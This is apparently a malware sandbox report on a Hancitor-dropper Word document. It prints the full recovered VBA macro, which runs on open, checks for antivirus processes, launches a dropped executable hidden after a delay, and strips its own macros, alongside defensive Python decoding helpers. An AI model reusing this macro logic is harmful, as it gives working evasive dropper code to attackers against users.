Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 dfeb8f1277813ac5…

MALICIOUS

Office (OLE)

259.0 KB Created: 2018-10-10 13:54:00 Authoring application: Microsoft Office Word First seen: 2020-02-04
MD5: b31b959c7d97b55bd1d49a44ff039dbf SHA-1: 329cf2c9c4b58304c2ac289a4dcba2f640923792 SHA-256: dfeb8f1277813ac525b258113bff3dd5ab28eb0902ad3123352c2b36d44da07c
700 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1140 Deobfuscate/Decode Files or Information T1204.002 Malicious File T1218.005 Mshta

The sample carries VBA macros that run from Document_Open. The recovered source rebuilds strings at run time with an MSXML bin.base64 helper (DecodeBase64, which returns a byte array) followed by StrConv(..., vbUnicode), and with piecewise concatenation such as "\6.e" & "x" & "e". The Base64 literals decode to 'cmd.exe /c  ping localhost -n 100 && ' (a ping loop used as a delay of roughly 100 seconds before the command that follows it), 'Temp' and '\6.pif'. Nothing in the recovered source downloads anything: the files it executes are copies the macro makes inside %TEMP% from 5C.pif to 6.exe and 6.pif with FileSystemObject.CopyFile, and where 5C.pif comes from is not visible in the extracted code. Document_Open performs those copies, moves the Selection and overwrites the clipboard, waits three seconds, re-saves the document as wdFormatXMLDocument (the macro-free .docx format, so the saved copy no longer carries the VBA project) and quits Word. The quit fires Document_Close, which waits 15 seconds, enumerates running processes over WMI (GetObject("winmgmts:") and SELECT * FROM Win32_Process) and branches on the process names bdagent.exe, PSUAMain.exe and n360.exe: with bdagent.exe present it writes %TEMP%\1.hta (the embedded Base64 block decodes to an HTA header that moves its window to -32000,-32000, off-screen; the rest of the HTA body is read from UserForm3.TextBox1.Text, which is not in the extracted source) and runs it through an object whose ProgID is assembled from three UserForm text boxes; with PSUAMain.exe or n360.exe it runs %TEMP%\6.exe directly; otherwise it runs cmd.exe with the ping delay followed by %TEMP%\6.pif. Separately from the macro, the OLE container holds XOR-encoded (key 0x78) API names and plain references to ShellExecute, LoadLibrary and VirtualProtect in an unallocated region. That is evidence of a native-code component, but this page shows no trigger that reaches it, and no PowerShell appears anywhere in the recovered code.

Heuristics 19

  • Office EPRINT stream contains EMF object high CVE related OLE_EPRINT_EMF_OBJECT
    The OLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is Office object-delivery evidence when paired with exploit-payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone, and no CVE is attributed on this page.
  • ClamAV: Doc.Dropper.Hancitor-6774061-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Hancitor-6774061-0
  • XOR-encoded strings (key 0x78) critical SC_XOR_ENCODED
    Found 3 Windows library/API name(s) XOR-encoded with single-byte key 0x78: 'LoadLibraryA', 'GetProcAddress', 'VirtualAlloc'
    Disassembly
    x86 disassembly · validity: uncertain (0.584) — 0/5 branch targets land on an instruction boundary (0% coherence). Zero branch coherence means the bytes below are almost certainly not code as stored: the listing is a linear sweep over a still-encoded region, and it should be disassembled again only after the region has been decoded with the recovered key 0x78.
    00026273  3417              xor al, 0x17
    00026275  191c34            sbb dword ptr [esp + esi], ebx
    00026278  111a              adc dword ptr [edx], ebx
    0002627A  0a19              or bl, byte ptr [ecx]
    0002627C  0a01              or al, byte ptr [ecx]
    0002627E  3978fb            cmp dword ptr [eax - 5], edi
    00026281  b87bf1fd60        mov eax, 0x60fdf17b
    00026286  87878720f3fd      xchg dword ptr [edi - 0x20cdf79], eax
    0002628C  60                pushal
    0002628D  87878728f335      xchg dword ptr [edi + 0x35f32887], eax
    00026293  8829              mov byte ptr [ecx], ch
    00026295  872da0f1fd4c      xchg dword ptr [0x4cfdf1a0], ebp
    0002629B  878787289078      xchg dword ptr [edi + 0x78902887], eax
    000262A1  7878              js 0x2631b
    000262A3  7820              js 0x262c5
    000262A5  93                xchg ebx, eax
    000262A6  752e              jne 0x262d6
    000262A8  110a              adc dword ptr [edx], ecx
    000262AA  0c0d              or al, 0xd
    000262AC  191439            sbb dword ptr [ecx + edi], edx
    000262AF  1414              adc al, 0x14
    000262B1  17                pop ss
    000262B2  1b78fb            sbb edi, dword ptr [eax - 5]
    000262B5  b87bf1fd40        mov eax, 0x40fdf17b
    000262BA  87878720f3ed      xchg dword ptr [edi - 0x120cdf79], eax
    000262C0  40                inc eax
    000262C1  8787872af33d      xchg dword ptr [edi + 0x3df32a87], eax
    000262C7  8828              mov byte ptr [eax], ch
    000262C9  872da0f13dc0      xchg dword ptr [0xc03df1a0], ebp
    000262CF  28                .byte 0x28
    000262D0  90                nop
    000262D1  7878              js 0x2634b
  • Raw OLE macro native-memory callback shellcode loader critical OLE_RAW_MACRO_NATIVE_MEMORY_CALLBACK_LOADER
    Raw OLE/VBA project text contains an auto-exec entry plus native memory allocation, process-memory write/copy, and callback/timer execution APIs. This catches source-stomped or partially recovered VBA loaders where the extracted macro source omits the auto-run entry, but the compiled/source project bytes still expose the in-memory shellcode loader triad. Caveat for this sample: the decoded VBA source in the extracted artifact below contains no Declare statement at all, so the API names behind this match are not visible in the recovered macro; the native-memory API names this page does show are the XOR-encoded strings under SC_XOR_ENCODED. Treat the rule as corroboration of a native-code component, not as proof that the macro itself is the loader.
  • VBA macros detected medium 8 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
      Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & "\6.e" & "x" & "e", vbHide
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. The rule text describes Win32_Process.Create, but the recovered source contains no .Create call: it runs ExecQuery("SELECT * FROM Win32_Process") on the winmgmts: object and compares each process name with bdagent.exe, PSUAMain.exe and n360.exe. The WMI use here is process discovery that picks the execution path according to which security product is running, not process creation; the "wi" & "nmgmts:" split is the string-concatenation hiding the rule refers to.
    Matched line in script
    Set vcxvxczcv = GetObject("wi" & "nmgmts:")
  • VBA Base64-decoded Shell command stager critical OLE_VBA_BASE64_SHELL_COMMAND_STAGER
    VBA auto-exec macro decodes Base64 string literals into command or script-launch text and executes the result with Shell. This catches cmd/cscript/PowerShell/VBS launchers hidden from plain keyword matching.
    Matched line in script
    Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & "\6.e" & "x" & "e", vbHide
    Decoded: cmd.exe /c  ping localhost -n 100 && %TEMP%\6.exe (two spaces after /c are in the literal; the same cmd.exe prefix is reused with %TEMP%\6.pif in the fall-through branch)
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set wsh = VBA.CreateObject(UserForm1.TextBox1.Text & UserForm4.TextBox1.Text & UserForm2.TextBox1.Text)
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set vcxvxczcv = GetObject("wi" & "nmgmts:")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    Open Environ("Temp") & "\1.hta" For Output As #1
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 265,216 bytes but its declared streams total only 154,673 bytes: 110,543 bytes (42%) live in unallocated sector slack. Slack of this size is the classic hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached through a parser memory-corruption bug in the document structure). This page identifies no corrupted record or other trigger that would reach that slack; the only execution path shown is the macro, so the slack contents are a second, unconfirmed component until the EMF/EPRINT material is examined.
  • Reference to VirtualProtect API medium SC_STR_VIRTUALPROTECT
    Reference to VirtualProtect API
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    All ten URLs below are XML namespace identifiers (Adobe XMP and Photoshop metadata, RDF, Dublin Core and OOXML schemas) that appear verbatim in embedded image metadata and document parts; they are not contacted at run time and are not network indicators.
    • http://ns.adobe.com/xap/1.0/ · In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# · In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/ · In document text (OLE body)
    • http://purl.org/dc/elements/1.1/ · In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ · In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# · In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# · In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography · In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml · In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main · In document text (OLE body)
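The SC_XOR_ENCODED finding above (key 0x78 revealing LoadLibraryA, GetProcAddress and VirtualAlloc) is a result you can reproduce on any suspect region, such as the unallocated slack reported by OLE_SLACK_ANOMALY: try all 255 single-byte keys, decode, and search for import names that hand-rolled shellcode resolves itself. The block below is an added example written for this page; it is not the report's scanner and not code from the sample. Its input blob is constructed for the demo, and API_NAMES, make_sample_blob, find_xor_encoded_api_names and best_key are names chosen here.

```python
"""Recover a single-byte XOR key by known-plaintext search for API names.

Added example, not the report's scanner and not code from the sample.
The blob is constructed here; on a real case pass the raw bytes of the
suspect region (e.g. the OLE slack) to find_xor_encoded_api_names().
"""

# Import names that shellcode resolves by hand; extend as needed.
API_NAMES = (
    b"LoadLibraryA", b"GetProcAddress", b"VirtualAlloc", b"VirtualProtect",
    b"ShellExecuteA", b"CreateProcessA", b"WinExec", b"URLDownloadToFileA",
)


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with one key byte (0..255)."""
    return bytes(b ^ key for b in data)


def make_sample_blob(key: int = 0x78) -> bytes:
    """Constructed input: three NUL-terminated API names encoded with one
    key, separated by non-text filler, like a string table in shellcode."""
    filler = bytes(range(0x10, 0x30))
    blob = b""
    for name in (b"LoadLibraryA", b"GetProcAddress", b"VirtualAlloc"):
        blob += filler + xor_bytes(name + b"\x00", key)
    return blob + filler


def find_xor_encoded_api_names(blob: bytes, names=API_NAMES, min_len: int = 6) -> dict:
    """Map key -> [(offset, name), ...] for every key in 1..255 under which
    at least one API name appears in the decoded blob.

    Key 0 is skipped (that would be a plaintext search). Names shorter than
    min_len are ignored because short tokens appear by chance in binary data.
    """
    hits = {}
    for key in range(1, 256):
        decoded = xor_bytes(blob, key)
        for name in names:
            if len(name) < min_len:
                continue
            pos = decoded.find(name)
            while pos != -1:
                hits.setdefault(key, []).append((pos, name.decode("ascii")))
                pos = decoded.find(name, pos + 1)
    return hits


def best_key(hits: dict):
    """Key revealing the most distinct names; ties broken by total hits."""
    if not hits:
        return None
    return max(hits, key=lambda k: (len({n for _, n in hits[k]}), len(hits[k])))


if __name__ == "__main__":
    found = find_xor_encoded_api_names(make_sample_blob())
    key = best_key(found)
    print(f"key 0x{key:02x}")
    for offset, name in sorted(found[key]):
        print(f"  {offset:#06x}  {name}")
```

Once the key is known, decode the whole region with xor_bytes and only then disassemble it; the 0% branch coherence shown in the listing above is what you get from disassembling the still-encoded bytes. A rolling or multi-byte key defeats this single-byte search, and a region that matches under several keys with one short name each is noise, which is why best_key ranks by the number of distinct names rather than raw hit count.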

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 6528 bytes
SHA-256: 76c4454e6102794004230c7df6890f3b545e67e7a5187a50a8250fc22dcc5b20
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next


Call kfs
    


Call sdfsdf

 Set D = New DataObject
    D.SetText " "
    D.PutInClipboard
    Selection.MoveUp Unit:=wdScreen, Count:=7
   Selection.MoveUp Unit:=wdScreen, Count:=7
    Selection.MoveLeft Unit:=wdCharacter, Count:=13

  Dim t As Date
    t = Now
    Do
        DoEvents
    Loop Until Now >= DateAdd("s", 3, t)


Call Module1.killo

End Sub

Private Sub Document_Close()
Call closee

End Sub

Private Function DecodeBase64(ByVal strData As String) As Byte()

 

    Dim objXML As MSXML2.DOMDocument
    Dim objNode As MSXML2.IXMLDOMElement
    

    Set objXML = New MSXML2.DOMDocument
    Set objNode = objXML.createElement("b64")
    objNode.dataType = "bin.base64"
    objNode.Text = strData
    DecodeBase64 = objNode.nodeTypedValue
    
    Set objNode = Nothing
    Set objXML = Nothing

 

End Function

Attribute VB_Name = "Module1"
Sub killo()
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatXMLDocument
Application.Quit
End Sub

Attribute VB_Name = "Module2"
Sub closee()
  Dim t As Date
    t = Now
    Do
        DoEvents
    Loop Until Now >= DateAdd("s", 15, t)

Dim kjfaa

kjfaa = "bd" & "agent.exe"
Dim yrtfdsad, vcxvxczcv
Dim mbbmbdf
Set vcxvxczcv = GetObject("wi" & "nmgmts:")
Dim gfdfsfsfs
Set yrtfdsad = vcxvxczcv.ExecQuery("SELECT * FROM Win32_Process")
Dim hdffsdfs
For Each x In yrtfdsad
Set wsh = VBA.CreateObject(UserForm1.TextBox1.Text & UserForm4.TextBox1.Text & UserForm2.TextBox1.Text)
Dim pipec As Boolean: pipec = True



 If x.Name = kjfaa Then
 Dim lhjxvcvx
 lhjxvcvx = StrConv(DecodeBase64(UserForm3.TextBox1.Text), vbUnicode)
 
Open Environ("Temp") & "\1.hta" For Output As #1
  Print #1, StrConv(DecodeBase64("PGh0bWw+DQo8aGVhZD4NCiA8U0NSSVBUIExBTkdVQUdFPSJWQlNjcmlwdCI+DQogICAgICAgICAgV2luZG93Lk1vdmVUbyAtMzIwMDAsIC0zMjAwMA0KICAgICA8L1NDUklQVD4NCiAgICA8dGl0bGU+QXBwbGljYXRpb24gRXhlY3V0ZXI8L3RpdGxlPg0KICAgIDxIVEE6QVBQTElDQVRJT04gSUQ9Im9NeUFwcCIgDQogICAgICAgIEFQUExJQ0FUSU9OTkFNRT0iQXBwbGljYXRpb24gRXhlY3V0ZXIiIA0KICAgICAgICBCT1JERVI9Im5vIg0KICAgICAgICBDQVBUSU9OPSJubyINCiAgICAgICAgU0hPV0lOVEFTS0JBUj0ieWVzIg0KICAgICAgICBTSU5HTEVJTlNUQU5DRT0ieWVzIg0KICAgICAgICBTWVNNRU5VPSJ5ZXMiDQogICAgICAgIFNDUk9MTD0ibm8i"), vbUnicode)
  Print #1, lhjxvcvx
  Close #1
  
ChDir Environ("Temp")
wsh.Run Environ("Temp") & "\1.hta", 0, False
Exit Sub
   End If
    
   
    If x.Name = "PSUAMain.exe" Then

  Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & "\6.e" & "x" & "e", vbHide

Exit Sub
   End If
   
       If x.Name = "n360.exe" Then

  Shell Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & "\6.e" & "x" & "e", vbHide

Exit Sub
   End If
Next


Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & StrConv(DecodeBase64("XDYucGlm"), vbUnicode), vbHide


End Sub


Private Function DecodeBase64(ByVal strData As String) As Byte()

 

    Dim objXML As MSXML2.DOMDocument
    Dim objNode As MSXML2.IXMLDOMElement
    

    Set objXML = New MSXML2.DOMDocument
    Set objNode = objXML.createElement("b64")
    objNode.dataType = "bin.base64"
    objNode.Text = strData
    DecodeBase64 = objNode.nodeTypedValue
    
    Set objNode = Nothing
    Set objXML = Nothing

 

End Function




Attribute VB_Name = "Module3"
Sub kfs()
Selection.MoveDown Unit:=wdScreen, Count:=7
    Selection.MoveDown Unit:=wdScreen, Count:=7
 Selection.MoveRight Unit:=wdCharacter, Count:=24
    Selection.TypeBackspace
        Selection.Copy

End Sub

Attribute VB_Name = "Module4"

Sub sdfsdf()
ChDir Environ("Temp")


Selection.TypeBackspace

Call kklk
Call fadf
End Sub
Private Function DecodeBase64(ByVal strData As String) As Byte()

 

    Dim objXML As MSXML2.DOMDocument
    Dim objNode As MSXML2.IXMLDOMElement
    

    Set objXML = New MSXML2.DOMDocument
    Set objNode = objXML.createElement("b64")
    objNode.dataType = "bin.base64"
    objNode.Text = strData
    DecodeBase64 = objNode.nodeTypedValue
    
    Set objNode = Nothing
    Set objXML = Nothing

 

End Function
Sub fadf()
kk = ".p" & "if"

   Dim FSO As Object
Set FSO = CreateObject("scripting.filesystemobject")

FSO.copyfile Source:="5C" & kk, Destination:="6" & ".pif"
End Sub


Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{98724B47-B6B1-4ACE-A61D-68A71704E485}{D4E86E16-6812-4454-A79B-F0F8445F873E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{6E5DDC7C-02D6-42D7-8C2B-464A67B87231}{5A3B6867-AEB6-42C7-947F-2780DE25BC20}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Module5"
Sub kklk()
   
 ChDir Environ("Temp")
Dim kk, lll, jgf, tyretw, gdfsfsa

jgf = "x" & "e"

kk = ".p" & "if"
lll = "6" & ".e"
Dim FSO As Object
Set FSO = CreateObject("scripting.filesystemobject")


FSO.copyfile Source:="5C" & kk, Destination:=lll & jgf
End Sub

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{A8BE1721-343B-43FD-8170-3048F0850358}{F01B3F9F-3293-4142-91F9-90FF9B3DB8AA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm4"
Attribute VB_Base = "0{9273F296-A00B-40A9-BA2D-E27C576ACCC5}{EEC3516B-03C1-4094-89AD-1FE03D9AE4C2}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
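Reading the recovered macro is easier once its run-time string assembly is folded back into the commands it actually runs. The block below is an added example written for this page, not part of the report and not the sample's own code. It models the macro's DecodeBase64/StrConv(..., vbUnicode) pair (MSXML bin.base64 yields the raw bytes, StrConv widens them to text, so the net effect is plain Base64 decoding), replaces Environ("X") with %X%, and joins "a" & "b" & ... literal chains while keeping anything it cannot resolve (such as the UserForm text boxes) in angle brackets. The MACRO_EXCERPT it runs on is copied from Module2 and Module5 above; the regexes and the names fold_expr and reconstruct are choices made here.

```python
"""Fold the run-time string construction in the recovered macro back into
the commands it executes.

Added example, not the report's tooling and not the sample's code. The
excerpt below is copied from the recovered Module2/Module5 source.
"""
import base64
import re

MACRO_EXCERPT = r'''
kjfaa = "bd" & "agent.exe"
kk = ".p" & "if"
lll = "6" & ".e"
Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & "\6.e" & "x" & "e", vbHide
Shell Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & "\6.e" & "x" & "e", vbHide
Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & StrConv(DecodeBase64("XDYucGlm"), vbUnicode), vbHide
'''

# StrConv(DecodeBase64("..."), vbUnicode) or a bare DecodeBase64("...")
B64_CALL = re.compile(r'(?:StrConv\()?DecodeBase64\("([A-Za-z0-9+/=]+)"\)(?:,\s*vbUnicode\))?')
ENVIRON_CALL = re.compile(r'Environ\("([^"]+)"\)')
SHELL_LINE = re.compile(r'^\s*Shell\s+(.*?)(?:,\s*vb\w+)?\s*$')
ASSIGN_LINE = re.compile(r'^\s*(\w+)\s*=\s*(.+?)\s*$')


def decode_b64_calls(expr: str) -> str:
    """Replace each DecodeBase64 call with the quoted text it produces."""
    return B64_CALL.sub(
        lambda m: '"' + base64.b64decode(m.group(1)).decode("latin-1") + '"', expr)


def fold_environ(expr: str) -> str:
    """Environ("Temp") -> "%Temp%"; the real value is only known at run time."""
    return ENVIRON_CALL.sub(lambda m: '"%' + m.group(1) + '%"', expr)


def split_concat(expr: str) -> list:
    """Split on & operators that sit outside double-quoted string literals."""
    parts, buf, in_str = [], [], False
    for ch in expr:
        if ch == '"':
            in_str = not in_str
        if ch == "&" and not in_str:
            parts.append("".join(buf).strip())
            buf = []
        else:
            buf.append(ch)
    parts.append("".join(buf).strip())
    return parts


def join_literals(expr: str) -> str:
    """Concatenate literal pieces; anything still symbolic is kept in <>."""
    out = []
    for part in split_concat(expr):
        if len(part) >= 2 and part[0] == '"' and part[-1] == '"':
            out.append(part[1:-1].replace('""', '"'))
        else:
            out.append("<" + part + ">")
    return "".join(out)


def fold_expr(expr: str) -> str:
    """Full pipeline for one VBA string expression."""
    return join_literals(fold_environ(decode_b64_calls(expr)))


def reconstruct(macro_text: str):
    """Return (literal assignments, Shell commands) recovered from the text."""
    assignments, commands = {}, []
    for line in macro_text.splitlines():
        m = SHELL_LINE.match(line)
        if m:
            commands.append(fold_expr(m.group(1)))
            continue
        m = ASSIGN_LINE.match(line)
        if m and m.group(2).startswith('"'):
            assignments[m.group(1)] = fold_expr(m.group(2))
    return assignments, commands


if __name__ == "__main__":
    names, cmds = reconstruct(MACRO_EXCERPT)
    for var, value in names.items():
        print(f"{var} = {value}")
    for cmd in cmds:
        print("Shell:", cmd)
```

The three Shell commands come out as cmd.exe /c  ping localhost -n 100 && %Temp%\6.exe, %Temp%\6.exe and cmd.exe /c  ping localhost -n 100 && %Temp%\6.pif, and kjfaa resolves to bdagent.exe, which is why the WMI loop is a security-product check rather than a launcher. The same folding applied to the wsh.Run and CreateObject lines stops at the UserForm text boxes, marking exactly which values (the ProgID and the HTA body) this page does not contain.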